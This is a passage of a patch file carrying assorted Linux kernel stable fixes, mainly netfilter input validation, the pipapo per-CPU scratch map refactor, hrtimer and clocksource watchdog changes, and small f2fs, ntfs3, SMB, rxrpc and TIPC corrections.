+ void f2fs_compress_write_end_io(struct bio *bio, struct page *page);
+ bool f2fs_is_compress_backend_ready(struct inode *inode);
++bool f2fs_is_compress_level_valid(int alg, int lvl);
+ int f2fs_init_compress_mempool(void);
+ void f2fs_destroy_compress_mempool(void);
+ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task);
+@@ -4283,6 +4284,7 @@ static inline bool f2fs_is_compress_backend_ready(struct inode *inode)
+ 	/* not support compression */
+ 	return false;
+ }
++static inline bool f2fs_is_compress_level_valid(int alg, int lvl) { return false; }
+ static inline struct page *f2fs_compress_control_page(struct page *page)
+ {
+ 	WARN_ON_ONCE(1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 3805162dcef2b..0c0d0671febea 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -628,7 +628,7 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (level < LZ4HC_MIN_CLEVEL || level > LZ4HC_MAX_CLEVEL) {
++	if (!f2fs_is_compress_level_valid(COMPRESS_LZ4, level)) {
+ 		f2fs_info(sbi, "invalid lz4hc compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+@@ -666,7 +666,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (level < zstd_min_clevel() || level > zstd_max_clevel()) {
++	if (!f2fs_is_compress_level_valid(COMPRESS_ZSTD, level)) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 8c9abaf139e67..74482ef569ab7 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -467,7 +467,7 @@ bool al_delete_le(struct ntfs_inode *ni, enum ATTR_TYPE type, CLST vcn,
+ int al_update(struct ntfs_inode *ni, int sync);
+ static inline size_t al_aligned(size_t size)
+ {
+-	return (size + 1023) & ~(size_t)1023;
++	return size_add(size, 1023) & ~(size_t)1023;
+ }
+ 
+ /* Globals from bitfunc.c */
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 634035bcb9347..b8e14bcd2c68d 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -248,6 +248,8 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 					 &iface->sockaddr,
+ 					 rc);
+ 				kref_put(&iface->refcount, release_iface);
++				/* failure to add chan should increase weight */
++				iface->weight_fulfilled++;
+ 				continue;
+ 			}
+ 
+diff --git a/include/linux/dmaengine.h b/include/linux/dmaengine.h
+index c923f4e60f240..3576c6e89fea4 100644
+--- a/include/linux/dmaengine.h
++++ b/include/linux/dmaengine.h
+@@ -954,7 +954,8 @@ static inline int dmaengine_slave_config(struct dma_chan *chan,
+ 
+ static inline bool is_slave_direction(enum dma_transfer_direction direction)
+ {
+-	return (direction == DMA_MEM_TO_DEV) || (direction == DMA_DEV_TO_MEM);
++	return (direction == DMA_MEM_TO_DEV) || (direction == DMA_DEV_TO_MEM) ||
++	       (direction == DMA_DEV_TO_DEV);
+ }
+ 
+ static inline struct dma_async_tx_descriptor *dmaengine_prep_slave_single(
+diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
+index f2044d5a652b5..254d4a898179c 100644
+--- a/include/linux/hrtimer.h
++++ b/include/linux/hrtimer.h
+@@ -197,6 +197,7 @@ enum  hrtimer_base_type {
+  * @max_hang_time:	Maximum time spent in hrtimer_interrupt
+  * @softirq_expiry_lock: Lock which is taken while softirq based hrtimer are
+  *			 expired
++ * @online:		CPU is online from an hrtimers point of view
+  * @timer_waiters:	A hrtimer_cancel() invocation waits for the timer
+  *			callback to finish.
+  * @expires_next:	absolute time of the next event, is required for remote
+@@ -219,7 +220,8 @@ struct hrtimer_cpu_base {
+ 	unsigned int			hres_active		: 1,
+ 					in_hrtirq		: 1,
+ 					hang_detected		: 1,
+-					softirq_activated       : 1;
++					softirq_activated       : 1,
++					online			: 1;
+ #ifdef CONFIG_HIGH_RES_TIMERS
+ 	unsigned int			nr_events;
+ 	unsigned short			nr_retries;
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index af8f4c304d272..707af820f1a97 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -266,9 +266,11 @@ enum nft_rule_attributes {
+ /**
+  * enum nft_rule_compat_flags - nf_tables rule compat flags
+  *
++ * @NFT_RULE_COMPAT_F_UNUSED: unused
+  * @NFT_RULE_COMPAT_F_INV: invert the check result
+  */
+ enum nft_rule_compat_flags {
++	NFT_RULE_COMPAT_F_UNUSED = (1 << 0),
+ 	NFT_RULE_COMPAT_F_INV	= (1 << 1),
+ 	NFT_RULE_COMPAT_F_MASK	= NFT_RULE_COMPAT_F_INV,
+ };
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 67f09a40bcb21..618ab186fe036 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -875,6 +875,7 @@ retry_multishot:
+ 		if (!buf)
+ 			return -ENOBUFS;
+ 		sr->buf = buf;
++		sr->len = len;
+ 	}
+ 
+ 	ret = import_single_range(ITER_DEST, sr->buf, len, &iov, &msg.msg_iter);
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 1c90e710d537f..cc6db3bce1b2f 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -126,6 +126,7 @@ static DECLARE_WORK(watchdog_work, clocksource_watchdog_work);
+ static DEFINE_SPINLOCK(watchdog_lock);
+ static int watchdog_running;
+ static atomic_t watchdog_reset_pending;
++static int64_t watchdog_max_interval;
+ 
+ static inline void clocksource_watchdog_lock(unsigned long *flags)
+ {
+@@ -144,6 +145,7 @@ static void __clocksource_change_rating(struct clocksource *cs, int rating);
+  * Interval: 0.5sec.
+  */
+ #define WATCHDOG_INTERVAL (HZ >> 1)
++#define WATCHDOG_INTERVAL_MAX_NS ((2 * WATCHDOG_INTERVAL) * (NSEC_PER_SEC / HZ))
+ 
+ static void clocksource_watchdog_work(struct work_struct *work)
+ {
+@@ -396,8 +398,8 @@ static inline void clocksource_reset_watchdog(void)
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
++	int64_t wd_nsec, cs_nsec, interval;
+ 	int next_cpu, reset_pending;
+-	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
+ 	unsigned long extra_wait = 0;
+@@ -467,6 +469,27 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 		if (atomic_read(&watchdog_reset_pending))
+ 			continue;
+ 
++		/*
++		 * The processing of timer softirqs can get delayed (usually
++		 * on account of ksoftirqd not getting to run in a timely
++		 * manner), which causes the watchdog interval to stretch.
++		 * Skew detection may fail for longer watchdog intervals
++		 * on account of fixed margins being used.
++		 * Some clocksources, e.g. acpi_pm, cannot tolerate
++		 * watchdog intervals longer than a few seconds.
++		 */
++		interval = max(cs_nsec, wd_nsec);
++		if (unlikely(interval > WATCHDOG_INTERVAL_MAX_NS)) {
++			if (system_state > SYSTEM_SCHEDULING &&
++			    interval > 2 * watchdog_max_interval) {
++				watchdog_max_interval = interval;
++				pr_warn("Long readout interval, skipping watchdog check: cs_nsec: %lld wd_nsec: %lld\n",
++					cs_nsec, wd_nsec);
++			}
++			watchdog_timer.expires = jiffies;
++			continue;
++		}
++
+ 		/* Check the deviation from the watchdog clocksource. */
+ 		md = cs->uncertainty_margin + watchdog->uncertainty_margin;
+ 		if (abs(cs_nsec - wd_nsec) > md) {
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 5561dabc9b225..8e0aff1d1ea4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -1082,6 +1082,7 @@ static int enqueue_hrtimer(struct hrtimer *timer,
+ 			   enum hrtimer_mode mode)
+ {
+ 	debug_activate(timer, mode);
++	WARN_ON_ONCE(!base->cpu_base->online);
+ 
+ 	base->cpu_base->active_bases |= 1 << base->index;
+ 
+@@ -2180,6 +2181,7 @@ int hrtimers_prepare_cpu(unsigned int cpu)
+ 	cpu_base->softirq_next_timer = NULL;
+ 	cpu_base->expires_next = KTIME_MAX;
+ 	cpu_base->softirq_expires_next = KTIME_MAX;
++	cpu_base->online = 1;
+ 	hrtimer_cpu_base_init_expiry_lock(cpu_base);
+ 	return 0;
+ }
+@@ -2247,6 +2249,7 @@ int hrtimers_cpu_dying(unsigned int dying_cpu)
+ 	smp_call_function_single(ncpu, retrigger_next_event, NULL, 0);
+ 
+ 	raw_spin_unlock(&new_base->lock);
++	old_base->online = 0;
+ 	raw_spin_unlock(&old_base->lock);
+ 
+ 	return 0;
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 2f646335d2183..9408dc3bb42d3 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -1637,10 +1637,12 @@ EXPORT_SYMBOL(inet_current_timestamp);
+ 
+ int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
+ {
+-	if (sk->sk_family == AF_INET)
++	unsigned int family = READ_ONCE(sk->sk_family);
++
++	if (family == AF_INET)
+ 		return ip_recv_error(sk, msg, len, addr_len);
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family == AF_INET6)
++	if (family == AF_INET6)
+ 		return pingv6_ops.ipv6_recv_error(sk, msg, len, addr_len);
+ #endif
+ 	return -EINVAL;
+diff --git a/net/ipv4/ip_tunnel_core.c b/net/ipv4/ip_tunnel_core.c
+index 586b1b3e35b80..80ccd6661aa32 100644
+--- a/net/ipv4/ip_tunnel_core.c
++++ b/net/ipv4/ip_tunnel_core.c
+@@ -332,7 +332,7 @@ static int iptunnel_pmtud_build_icmpv6(struct sk_buff *skb, int mtu)
+ 	};
+ 	skb_reset_network_header(skb);
+ 
+-	csum = csum_partial(icmp6h, len, 0);
++	csum = skb_checksum(skb, skb_transport_offset(skb), len, 0);
+ 	icmp6h->icmp6_cksum = csum_ipv6_magic(&nip6h->saddr, &nip6h->daddr, len,
+ 					      IPPROTO_ICMPV6, csum);
+ 
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index c07645c999f9a..c6f0da028a2a4 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -7221,8 +7221,7 @@ int ieee80211_mgd_assoc(struct ieee80211_sub_if_data *sdata,
+ 
+ 		rcu_read_lock();
+ 		beacon_ies = rcu_dereference(req->bss->beacon_ies);
+-
+-		if (beacon_ies) {
++		if (!beacon_ies) {
+ 			/*
+ 			 * Wait up to one beacon interval ...
+ 			 * should this be more if we miss one?
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index 6952da7dfc02c..e1623fbf36548 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -135,7 +135,7 @@ static void nft_target_eval_bridge(const struct nft_expr *expr,
+ 
+ static const struct nla_policy nft_target_policy[NFTA_TARGET_MAX + 1] = {
+ 	[NFTA_TARGET_NAME]	= { .type = NLA_NUL_STRING },
+-	[NFTA_TARGET_REV]	= { .type = NLA_U32 },
++	[NFTA_TARGET_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_TARGET_INFO]	= { .type = NLA_BINARY },
+ };
+ 
+@@ -200,6 +200,7 @@ static const struct nla_policy nft_rule_compat_policy[NFTA_RULE_COMPAT_MAX + 1]
+ static int nft_parse_compat(const struct nlattr *attr, u16 *proto, bool *inv)
+ {
+ 	struct nlattr *tb[NFTA_RULE_COMPAT_MAX+1];
++	u32 l4proto;
+ 	u32 flags;
+ 	int err;
+ 
+@@ -212,12 +213,18 @@ static int nft_parse_compat(const struct nlattr *attr, u16 *proto, bool *inv)
+ 		return -EINVAL;
+ 
+ 	flags = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_FLAGS]));
+-	if (flags & ~NFT_RULE_COMPAT_F_MASK)
++	if (flags & NFT_RULE_COMPAT_F_UNUSED ||
++	    flags & ~NFT_RULE_COMPAT_F_MASK)
+ 		return -EINVAL;
+ 	if (flags & NFT_RULE_COMPAT_F_INV)
+ 		*inv = true;
+ 
+-	*proto = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_PROTO]));
++	l4proto = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_PROTO]));
++	if (l4proto > U16_MAX)
++		return -EINVAL;
++
++	*proto = l4proto;
++
+ 	return 0;
+ }
+ 
+@@ -418,7 +425,7 @@ static void nft_match_eval(const struct nft_expr *expr,
+ 
+ static const struct nla_policy nft_match_policy[NFTA_MATCH_MAX + 1] = {
+ 	[NFTA_MATCH_NAME]	= { .type = NLA_NUL_STRING },
+-	[NFTA_MATCH_REV]	= { .type = NLA_U32 },
++	[NFTA_MATCH_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_MATCH_INFO]	= { .type = NLA_BINARY },
+ };
+ 
+@@ -721,7 +728,7 @@ out_put:
+ static const struct nla_policy nfnl_compat_policy_get[NFTA_COMPAT_MAX+1] = {
+ 	[NFTA_COMPAT_NAME]	= { .type = NLA_NUL_STRING,
+ 				    .len = NFT_COMPAT_NAME_MAX-1 },
+-	[NFTA_COMPAT_REV]	= { .type = NLA_U32 },
++	[NFTA_COMPAT_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_COMPAT_TYPE]	= { .type = NLA_U32 },
+ };
+ 
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 1101665f52537..8df7564f0611e 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -484,6 +484,9 @@ static int nft_ct_get_init(const struct nft_ctx *ctx,
+ 		break;
+ #endif
+ 	case NFT_CT_ID:
++		if (tb[NFTA_CT_DIRECTION])
++			return -EINVAL;
++
+ 		len = sizeof(u32);
+ 		break;
+ 	default:
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 4e1cc31729b80..e1969209b3abb 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -342,9 +342,6 @@
+ #include "nft_set_pipapo_avx2.h"
+ #include "nft_set_pipapo.h"
+ 
+-/* Current working bitmap index, toggled between field matches */
+-static DEFINE_PER_CPU(bool, nft_pipapo_scratch_index);
+-
+ /**
+  * pipapo_refill() - For each set bit, set bits from selected mapping table item
+  * @map:	Bitmap to be scanned for set bits
+@@ -412,6 +409,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 		       const u32 *key, const struct nft_set_ext **ext)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct nft_pipapo_scratch *scratch;
+ 	unsigned long *res_map, *fill_map;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const u8 *rp = (const u8 *)key;
+@@ -422,15 +420,17 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 
+ 	local_bh_disable();
+ 
+-	map_index = raw_cpu_read(nft_pipapo_scratch_index);
+-
+ 	m = rcu_dereference(priv->match);
+ 
+ 	if (unlikely(!m || !*raw_cpu_ptr(m->scratch)))
+ 		goto out;
+ 
+-	res_map  = *raw_cpu_ptr(m->scratch) + (map_index ? m->bsize_max : 0);
+-	fill_map = *raw_cpu_ptr(m->scratch) + (map_index ? 0 : m->bsize_max);
++	scratch = *raw_cpu_ptr(m->scratch);
++
++	map_index = scratch->map_index;
++
++	res_map  = scratch->map + (map_index ? m->bsize_max : 0);
++	fill_map = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+ 	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
+ 
+@@ -460,7 +460,7 @@ next_match:
+ 		b = pipapo_refill(res_map, f->bsize, f->rules, fill_map, f->mt,
+ 				  last);
+ 		if (b < 0) {
+-			raw_cpu_write(nft_pipapo_scratch_index, map_index);
++			scratch->map_index = map_index;
+ 			local_bh_enable();
+ 
+ 			return false;
+@@ -477,7 +477,7 @@ next_match:
+ 			 * current inactive bitmap is clean and can be reused as
+ 			 * *next* bitmap (not initial) for the next packet.
+ 			 */
+-			raw_cpu_write(nft_pipapo_scratch_index, map_index);
++			scratch->map_index = map_index;
+ 			local_bh_enable();
+ 
+ 			return true;
+@@ -1101,6 +1101,25 @@ static void pipapo_map(struct nft_pipapo_match *m,
+ 		f->mt[map[i].to + j].e = e;
+ }
+ 
++/**
++ * pipapo_free_scratch() - Free per-CPU map at original (not aligned) address
++ * @m:		Matching data
++ * @cpu:	CPU number
++ */
++static void pipapo_free_scratch(const struct nft_pipapo_match *m, unsigned int cpu)
++{
++	struct nft_pipapo_scratch *s;
++	void *mem;
++
++	s = *per_cpu_ptr(m->scratch, cpu);
++	if (!s)
++		return;
++
++	mem = s;
++	mem -= s->align_off;
++	kfree(mem);
++}
++
+ /**
+  * pipapo_realloc_scratch() - Reallocate scratch maps for partial match results
+  * @clone:	Copy of matching data with pending insertions and deletions
+@@ -1114,12 +1133,13 @@ static int pipapo_realloc_scratch(struct nft_pipapo_match *clone,
+ 	int i;
+ 
+ 	for_each_possible_cpu(i) {
+-		unsigned long *scratch;
++		struct nft_pipapo_scratch *scratch;
+ #ifdef NFT_PIPAPO_ALIGN
+-		unsigned long *scratch_aligned;
++		void *scratch_aligned;
++		u32 align_off;
+ #endif
+-
+-		scratch = kzalloc_node(bsize_max * sizeof(*scratch) * 2 +
++		scratch = kzalloc_node(struct_size(scratch, map,
++						   bsize_max * 2) +
+ 				       NFT_PIPAPO_ALIGN_HEADROOM,
+ 				       GFP_KERNEL, cpu_to_node(i));
+ 		if (!scratch) {
+@@ -1133,14 +1153,25 @@ static int pipapo_realloc_scratch(struct nft_pipapo_match *clone,
+ 			return -ENOMEM;
+ 		}
+ 
+-		kfree(*per_cpu_ptr(clone->scratch, i));
+-
+-		*per_cpu_ptr(clone->scratch, i) = scratch;
++		pipapo_free_scratch(clone, i);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+-		scratch_aligned = NFT_PIPAPO_LT_ALIGN(scratch);
+-		*per_cpu_ptr(clone->scratch_aligned, i) = scratch_aligned;
++		/* Align &scratch->map (not the struct itself): the extra
++		 * %NFT_PIPAPO_ALIGN_HEADROOM bytes passed to kzalloc_node()
++		 * above guarantee we can waste up to those bytes in order
++		 * to align the map field regardless of its offset within
++		 * the struct.
++		 */
++		BUILD_BUG_ON(offsetof(struct nft_pipapo_scratch, map) > NFT_PIPAPO_ALIGN_HEADROOM);
++
++		scratch_aligned = NFT_PIPAPO_LT_ALIGN(&scratch->map);
++		scratch_aligned -= offsetof(struct nft_pipapo_scratch, map);
++		align_off = scratch_aligned - (void *)scratch;
++
++		scratch = scratch_aligned;
++		scratch->align_off = align_off;
+ #endif
++		*per_cpu_ptr(clone->scratch, i) = scratch;
+ 	}
+ 
+ 	return 0;
+@@ -1294,11 +1325,6 @@ static struct nft_pipapo_match *pipapo_clone(struct nft_pipapo_match *old)
+ 	if (!new->scratch)
+ 		goto out_scratch;
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	new->scratch_aligned = alloc_percpu(*new->scratch_aligned);
+-	if (!new->scratch_aligned)
+-		goto out_scratch;
+-#endif
+ 	for_each_possible_cpu(i)
+ 		*per_cpu_ptr(new->scratch, i) = NULL;
+ 
+@@ -1350,10 +1376,7 @@ out_lt:
+ 	}
+ out_scratch_realloc:
+ 	for_each_possible_cpu(i)
+-		kfree(*per_cpu_ptr(new->scratch, i));
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(new->scratch_aligned);
+-#endif
++		pipapo_free_scratch(new, i);
+ out_scratch:
+ 	free_percpu(new->scratch);
+ 	kfree(new);
+@@ -1638,13 +1661,9 @@ static void pipapo_free_match(struct nft_pipapo_match *m)
+ 	int i;
+ 
+ 	for_each_possible_cpu(i)
+-		kfree(*per_cpu_ptr(m->scratch, i));
++		pipapo_free_scratch(m, i);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(m->scratch_aligned);
+-#endif
+ 	free_percpu(m->scratch);
+-
+ 	pipapo_free_fields(m);
+ 
+ 	kfree(m);
+@@ -2132,7 +2151,7 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	m->field_count = field_count;
+ 	m->bsize_max = 0;
+ 
+-	m->scratch = alloc_percpu(unsigned long *);
++	m->scratch = alloc_percpu(struct nft_pipapo_scratch *);
+ 	if (!m->scratch) {
+ 		err = -ENOMEM;
+ 		goto out_scratch;
+@@ -2140,16 +2159,6 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	for_each_possible_cpu(i)
+ 		*per_cpu_ptr(m->scratch, i) = NULL;
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	m->scratch_aligned = alloc_percpu(unsigned long *);
+-	if (!m->scratch_aligned) {
+-		err = -ENOMEM;
+-		goto out_free;
+-	}
+-	for_each_possible_cpu(i)
+-		*per_cpu_ptr(m->scratch_aligned, i) = NULL;
+-#endif
+-
+ 	rcu_head_init(&m->rcu);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+@@ -2180,9 +2189,6 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	return 0;
+ 
+ out_free:
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(m->scratch_aligned);
+-#endif
+ 	free_percpu(m->scratch);
+ out_scratch:
+ 	kfree(m);
+@@ -2236,11 +2242,8 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 
+ 		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-		free_percpu(m->scratch_aligned);
+-#endif
+ 		for_each_possible_cpu(cpu)
+-			kfree(*per_cpu_ptr(m->scratch, cpu));
++			pipapo_free_scratch(m, cpu);
+ 		free_percpu(m->scratch);
+ 		pipapo_free_fields(m);
+ 		kfree(m);
+@@ -2253,11 +2256,8 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 		if (priv->dirty)
+ 			nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-		free_percpu(priv->clone->scratch_aligned);
+-#endif
+ 		for_each_possible_cpu(cpu)
+-			kfree(*per_cpu_ptr(priv->clone->scratch, cpu));
++			pipapo_free_scratch(priv->clone, cpu);
+ 		free_percpu(priv->clone->scratch);
+ 
+ 		pipapo_free_fields(priv->clone);
+diff --git a/net/netfilter/nft_set_pipapo.h b/net/netfilter/nft_set_pipapo.h
+index 25a75591583eb..30a3d092cd841 100644
+--- a/net/netfilter/nft_set_pipapo.h
++++ b/net/netfilter/nft_set_pipapo.h
+@@ -130,21 +130,29 @@ struct nft_pipapo_field {
+ 	union nft_pipapo_map_bucket *mt;
+ };
+ 
++/**
++ * struct nft_pipapo_scratch - percpu data used for lookup and matching
++ * @map_index:	Current working bitmap index, toggled between field matches
++ * @align_off:	Offset to get the originally allocated address
++ * @map:	store partial matching results during lookup
++ */
++struct nft_pipapo_scratch {
++	u8 map_index;
++	u32 align_off;
++	unsigned long map[];
++};
++
+ /**
+  * struct nft_pipapo_match - Data used for lookup and matching
+  * @field_count		Amount of fields in set
+  * @scratch:		Preallocated per-CPU maps for partial matching results
+- * @scratch_aligned:	Version of @scratch aligned to NFT_PIPAPO_ALIGN bytes
+  * @bsize_max:		Maximum lookup table bucket size of all fields, in longs
+  * @rcu			Matching data is swapped on commits
+  * @f:			Fields, with lookup and mapping tables
+  */
+ struct nft_pipapo_match {
+ 	int field_count;
+-#ifdef NFT_PIPAPO_ALIGN
+-	unsigned long * __percpu *scratch_aligned;
+-#endif
+-	unsigned long * __percpu *scratch;
++	struct nft_pipapo_scratch * __percpu *scratch;
+ 	size_t bsize_max;
+ 	struct rcu_head rcu;
+ 	struct nft_pipapo_field f[];
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index 52e0d026d30ad..90e275bb3e5d7 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -71,9 +71,6 @@
+ #define NFT_PIPAPO_AVX2_ZERO(reg)					\
+ 	asm volatile("vpxor %ymm" #reg ", %ymm" #reg ", %ymm" #reg)
+ 
+-/* Current working bitmap index, toggled between field matches */
+-static DEFINE_PER_CPU(bool, nft_pipapo_avx2_scratch_index);
+-
+ /**
+  * nft_pipapo_avx2_prepare() - Prepare before main algorithm body
+  *
+@@ -1120,11 +1117,12 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			    const u32 *key, const struct nft_set_ext **ext)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	unsigned long *res, *fill, *scratch;
++	struct nft_pipapo_scratch *scratch;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const u8 *rp = (const u8 *)key;
+ 	struct nft_pipapo_match *m;
+ 	struct nft_pipapo_field *f;
++	unsigned long *res, *fill;
+ 	bool map_index;
+ 	int i, ret = 0;
+ 
+@@ -1141,15 +1139,16 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	 */
+ 	kernel_fpu_begin_mask(0);
+ 
+-	scratch = *raw_cpu_ptr(m->scratch_aligned);
++	scratch = *raw_cpu_ptr(m->scratch);
+ 	if (unlikely(!scratch)) {
+ 		kernel_fpu_end();
+ 		return false;
+ 	}
+-	map_index = raw_cpu_read(nft_pipapo_avx2_scratch_index);
+ 
+-	res  = scratch + (map_index ? m->bsize_max : 0);
+-	fill = scratch + (map_index ? 0 : m->bsize_max);
++	map_index = scratch->map_index;
++
++	res  = scratch->map + (map_index ? m->bsize_max : 0);
++	fill = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+ 	/* Starting map doesn't need to be set for this implementation */
+ 
+@@ -1221,7 +1220,7 @@ next_match:
+ 
+ out:
+ 	if (i % 2)
+-		raw_cpu_write(nft_pipapo_avx2_scratch_index, !map_index);
++		scratch->map_index = !map_index;
+ 	kernel_fpu_end();
+ 
+ 	return ret >= 0;
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index e34662f4a71e0..5bf5572e945cc 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -235,7 +235,7 @@ static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
+ 
+ static const struct nft_rbtree_elem *
+ nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
+-		   struct nft_rbtree_elem *rbe, u8 genmask)
++		   struct nft_rbtree_elem *rbe)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+@@ -254,7 +254,7 @@ nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
+ 	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		if (nft_rbtree_interval_end(rbe_prev) &&
+-		    nft_set_elem_active(&rbe_prev->ext, genmask))
++		    nft_set_elem_active(&rbe_prev->ext, NFT_GENMASK_ANY))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+@@ -365,7 +365,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			const struct nft_rbtree_elem *removed_end;
+ 
+-			removed_end = nft_rbtree_gc_elem(set, priv, rbe, genmask);
++			removed_end = nft_rbtree_gc_elem(set, priv, rbe);
+ 			if (IS_ERR(removed_end))
+ 				return PTR_ERR(removed_end);
+ 
+diff --git a/net/rxrpc/conn_event.c b/net/rxrpc/conn_event.c
+index aab0697013982..5d91ef562ff78 100644
+--- a/net/rxrpc/conn_event.c
++++ b/net/rxrpc/conn_event.c
+@@ -41,6 +41,14 @@ static void rxrpc_conn_retransmit_call(struct rxrpc_connection *conn,
+ 
+ 	_enter("%d", conn->debug_id);
+ 
++	if (sp && sp->hdr.type == RXRPC_PACKET_TYPE_ACK) {
++		if (skb_copy_bits(skb, sizeof(struct rxrpc_wire_header),
++				  &pkt.ack, sizeof(pkt.ack)) < 0)
++			return;
++		if (pkt.ack.reason == RXRPC_ACK_PING_RESPONSE)
++			return;
++	}
++
+ 	chan = &conn->channels[channel];
+ 
+ 	/* If the last call got moved on whilst we were waiting to run, just
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index cdcd2731860ba..1cb9935620886 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -1088,6 +1088,12 @@ int tipc_nl_bearer_add(struct sk_buff *skb, struct genl_info *info)
+ 
+ #ifdef CONFIG_TIPC_MEDIA_UDP
+ 	if (attrs[TIPC_NLA_BEARER_UDP_OPTS]) {
++		if (b->media->type_id != TIPC_MEDIA_TYPE_UDP) {
++			rtnl_unlock();
++			NL_SET_ERR_MSG(info->extack, "UDP option is unsupported");
++			return -EINVAL;
++		}
++
+ 		err = tipc_udp_nl_bearer_add(b,
+ 					     attrs[TIPC_NLA_BEARER_UDP_OPTS]);
